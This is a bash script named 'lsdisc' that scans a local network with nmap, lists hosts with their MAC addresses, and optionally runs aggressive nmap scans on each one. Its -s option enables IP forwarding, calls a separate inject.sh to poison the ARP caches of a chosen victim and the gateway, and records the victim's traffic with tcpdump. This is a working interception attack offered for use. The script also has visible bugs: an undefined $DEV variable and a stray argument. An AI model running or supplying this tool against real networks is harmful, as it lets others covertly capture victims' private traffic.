#!/bin/bash
# discover all hosts on a network, their ip addresses, MAC addresses,
# and which services are running on which ports

function usage {
    printf "$(basename $0): Local Network DISCovery - used to discover other "
    printf "hosts in a LAN\n"
    printf "usage: lsdisc [-hlsv]\n"
    printf "\t -h: print this message and exit\n"
    printf "\t -l: list other hosts in the network\n"
    printf "\t -s: perform active sniffing on one of the hosts listed. This\n"
    printf "\t     is accomplished by poisoning the ARP cache on both the\n"
    printf "\t     selected host and the gateway (router) and running\n"
    printf "\t     tcpdump filtered for the selected host\n"
    printf "\t -v: run 'nmap' on each host for detailed, verbose info\n\n"
}
if [ $# -eq 0 ]; then
    usage
    exit 1
fi

JUST_LIST=0
SNIFF=0
VERBOSE=0
while getopts ":hlsv" opt; do
    case "$opt" in
        h)
            usage
            exit 0
            ;;
        l)
            JUST_LIST=1
            ;;
        s)
            SNIFF=1
            ;;
        v)
            VERBOSE=1
            ;;
        :)
            echo Option -$OPTARG requires param
    esac
done

# get my ip address
DEVS=$(ifconfig -s | grep BMRU | grep -vi docker | awk '{print $1}')
for dev in $DEVS; do
    if echo $(ifconfig "$dev") | grep -q 'inet addr'; then
        MY_ADDR=$(ifconfig "$dev" | grep 'inet addr' | awk '{print $2}' | cut -d ':' -f2)
        MY_MAC=$(ifconfig "$dev" | grep HWaddr | awk '{print $5}')
        MY_DEV="$dev"
        break
    fi
done
echo My IP address: $MY_ADDR
echo My MAC: $MY_MAC

# get default Gateway
GATEADD=$(route -n | grep "$MY_DEV" | grep 'UG' | grep '0.0.0.0' | awk '{print $2}')
GATEMAC=`arp -an | grep "$MY_DEV" | grep "($GATEADD)" | awk '{print $4}'`
echo Default Gateway: "$GATEADD ($GATEMAC)"

echo "Scanning for hosts on network..."
IPS=()

ips=$(nmap -sn ${GATEADD}/24 | grep 'scan report' | awk '{print $5}')
for ip in $ips
do
    if [ $ip != $MY_ADDR ] && [ $ip != $GATEADD ]; then
        MAC=$(arp -an | grep "$ip" | awk '{print $4}')
        IPS+=("$ip=$MAC")
    fi
done

printf "\n====================\n"
printf "Hosts:\n"
printf "====================\n"
COUNT=0
for IP in "${IPS[@]}"; do
    IFS='='; read -ra VALUES <<< "$IP"; unset IFS
    if [ $SNIFF -eq 1 ]; then
        echo "[$COUNT] ${VALUES[0]} (${VALUES[1]})"
        COUNT=$(($COUNT + 1))
    else
        echo "${VALUES[0]} (${VALUES[1]})"
    fi
done

if [ $JUST_LIST -eq 1 ]; then
    exit 0
fi

# run nmap on each host
if [ $VERBOSE -eq 1 ]; then
    for IP in "${IPS[@]}"; do
        IFS='='; read -ra VALUES <<< "$IP"; unset IFS
        nmap -A -T4 -PN "${VALUES[0]}"
        printf "\n=================================================="
        printf "==============================\n"
    done
fi

if [ $SNIFF -eq 1 ]; then
    echo "You have chosen to sniff packets traveling to/from a particular host."
    read -p "Please select the host IP address from the list above: " num
    IFS='='; read -ra VALUES <<< "${IPS[$num]}"; unset IFS
    echo "Sniff packets on ${VALUES[0]} (type number next to action)?"
    select yn in "Yes" "No"; do
        case "$yn" in
            Yes)
                IP_TO_SNIFF=${VALUES[0]}
                MAC_TO_SNIFF=${VALUES[1]}
                break;;
            No)
                exit;;
        esac
    done
fi

if [ -n "$IP_TO_SNIFF" ]; then
    printf "Roger,\n"
    echo "commence ARP cache poisoning and tcpdump on $IP_TO_SNIFF ($MAC_TO_SNIFF)"

    # turn on IP forwarding
    sudo sysctl -w net.ipv4.ip_forward=1
    /bin/bash inject.sh $IP_TO_SNIFF $MAC_TO_SNIFF $GATEADD $GATEMAC $MY_MAC $DEV $ > /dev/null &

    sudo tcpdump -i $DEV -l -A "ip host $IP_TO_SNIFF" -w /tmp/packets.dump
fi


# sysctl -w net.ipv4.ip_forward=1
